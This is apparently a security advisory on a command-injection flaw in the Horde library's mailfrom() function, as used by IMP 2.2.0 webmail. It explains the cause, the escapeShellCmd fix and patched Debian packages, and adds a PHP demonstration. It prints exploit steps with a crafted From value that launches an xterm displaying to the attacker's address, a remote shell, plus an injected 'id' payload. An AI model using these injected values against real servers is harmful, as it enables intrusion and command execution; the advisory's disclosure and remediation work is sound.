COMMAND

    IMP

SYSTEMS AFFECTED

    IMP 2.2.0

PROBLEM

    Christian Winter found the following.  This is intended as a paper
    for sysadmins who want to secure their systems.  It is NOT a how-to
    for scriptkiddies to run an attack on an IMP-using site.

    The authors  of this  text will  not be  held responsible  for any
    damage resulting  from others  using the  documented exploits  for
    attacking or invading 3rd parties' computers or networks.

    Bug found and exploited by Jens "atomi" Steube.  Fixed and
    documented by Christian "thepoet" Winter.

    The bug was found in the Horde library code of Horde 1.2.0.  Other
    versions have not been checked yet.  If you are unsure whether your
    version is also affected, please contact the Horde authors as
    described on http://horde.org.

    The $from bug is in the Horde library file 'horde.lib' (on Debian
    systems installed as /usr/share/horde/lib/horde.lib), at line 1108
    in the function "mailfrom".  There, popen() is called with the
    unchecked "From:" value pasted straight into its command string.
    The exact line is:

        $mail = popen("$default->path_to_sendmail -i -f$from --$recipients", 'w');

    popen() hands that string to /bin/sh, so if the user passes a
    string containing the "&" character (or any other shell
    metacharacter such as ";" or "|") as $from, arbitrary commands are
    executed under the uid and gid the webserver is running as.

    Usually the horde.lib mailfrom() function is called by the IMP
    webmail interface.  As IMP also does not check for the "&"
    character, the value is passed on to popen() unchanged.  Other
    software projects that use the Horde library could be exploited by
    the same means.

        1) Open IMP and press Compose to write a new mail.
        2) As your From e-mail address, an exploit $from line could be:
           &"/usr/X11R6/bin/xterm -display 127.0.0.1:0.0"&
           (remember to replace 127.0.0.1 with your own IP address and
           to verify the path to xterm), or any other command you want.
        3) Enter a recipient.
        4) Send the message, done.

SOLUTION

    The Horde library already provides a function that prevents this
    kind of exploit, called "escapeShellCmd".  It is applied to the
    "$recipients" variable but not to "$from".

    To secure an installed Horde it is sufficient to insert the
    following line immediately before the popen() call at line 1108 of
    /usr/share/horde/lib/horde.lib:

        $from = escapeShellCmd( $from );
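
    The popen() line and the one-line fix, side by side, as an added
    example that is not Horde's own code: it rebuilds the shape of the
    mailfrom() command string, runs it through popen() the way Horde
    does, and uses the shell's printf as a harmless stand-in for
    sendmail so the arguments the shell finally hands over can be seen.
    The sendmail stand-in, the addresses, the function names and the
    crafted From value (with "id" instead of xterm) are all assumptions
    for the demo.  The third variant goes beyond the advisory's fix:
    the PHP manual warns that escapeshellcmd() still lets an attacker
    pass additional arguments (spaces are not escaped), so it validates
    the address and quotes it with escapeshellarg() instead.

```php
<?php
// Added example, not Horde's code. Reconstructs the horde.lib mailfrom()
// command line so the injection and the escapeShellCmd fix can be watched
// without a real sendmail. Paths, addresses and From values are assumed.

// Stand-in for $default->path_to_sendmail: the shell's printf, which just
// echoes, one per line in brackets, the arguments the shell hands to it.
$path_to_sendmail = 'printf "[%s]\n"';
$recipients       = 'victim@example.org';

// Horde 1.2.0 shape: $recipients is escaped, $from is pasted in raw.
function command_1_2_0(string $sendmail, string $from, string $recipients): string
{
    return "$sendmail -i -f$from -- " . escapeshellcmd($recipients);
}

// The advisory's fix applied: $from goes through escapeshellcmd() too.
function command_fixed(string $sendmail, string $from, string $recipients): string
{
    $from = escapeshellcmd($from);
    return "$sendmail -i -f$from -- " . escapeshellcmd($recipients);
}

// Stricter variant (beyond the advisory): accept only a bare address, then
// quote it with escapeshellarg() so the shell sees exactly one word after
// -f whatever the value contains. The address pattern is an assumption.
function command_strict(string $sendmail, string $from, string $recipients): string
{
    if (!preg_match('/^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+$/', $from)) {
        throw new InvalidArgumentException("rejecting From value: $from");
    }
    return "$sendmail -i -f" . escapeshellarg($from)
         . ' -- ' . escapeshellarg($recipients);
}

// Run a command line the way mailfrom() does, through popen() and hence
// /bin/sh, but read its output instead of writing a message into it.
// The subshell plus 2>&1 keeps the shell's own complaints in the capture.
function run(string $cmd): string
{
    $p   = popen("($cmd) 2>&1", 'r');
    $out = stream_get_contents($p);
    pclose($p);
    return $out;
}

// Crafted From value in the style of the advisory, with "id" in place of
// xterm so it is safe to execute here.
$evil_from = '&"id"&';
$good_from = 'alice@example.org';

echo "--- Horde 1.2.0, crafted From ---\n";
echo command_1_2_0($path_to_sendmail, $evil_from, $recipients), "\n";
// The shell splits this into three commands: printf (backgrounded by the
// first &), then id, then "--", which it cannot find. Because of the & the
// order of the lines may vary, but a uid= line from id is always there.
echo run(command_1_2_0($path_to_sendmail, $evil_from, $recipients));

echo "--- fixed, crafted From ---\n";
echo command_fixed($path_to_sendmail, $evil_from, $recipients), "\n";
// Both & are now backslashed, so the whole odd From value is one word
// that printf (sendmail) receives as data; id never runs.
echo run(command_fixed($path_to_sendmail, $evil_from, $recipients));

echo "--- strict, good and crafted From ---\n";
echo run(command_strict($path_to_sendmail, $good_from, $recipients));
try {
    command_strict($path_to_sendmail, $evil_from, $recipients);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

    Run it with the php command-line binary on a Unix host.  Comparing
    the first two outputs shows exactly what the one-line fix changes:
    the metacharacters survive into the argument, but the shell no
    longer treats them as command separators.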

    or download a patch from:

        http://ssl.coc-ag.de/sec/hordelib-1.2.0.frombug.patch

    The included fix has been applied to the CVS code for both the
    Horde 1.2 branch and the Horde 1.3 (development) branch.  Horde
    1.2.1 and IMP 2.2.1 will have this fixed.  In addition to this fix,
    the new releases will also include a number of small bug fixes and
    improvements.

    For Debian, updated packages are available from:

        http://security.debian.org/dists/stable/updates/main/source/horde_1.2.1-0.dsc
        http://security.debian.org/dists/stable/updates/main/source/horde_1.2.1-0.tar.gz
        http://security.debian.org/dists/stable/updates/main/source/imp_2.2.1-0.dsc
        http://security.debian.org/dists/stable/updates/main/source/imp_2.2.1-0.tar.gz
        http://security.debian.org/dists/stable/updates/main/binary-all/horde_1.2.1-0_all.deb
        http://security.debian.org/dists/stable/updates/main/binary-all/imp_2.2.1-0_all.deb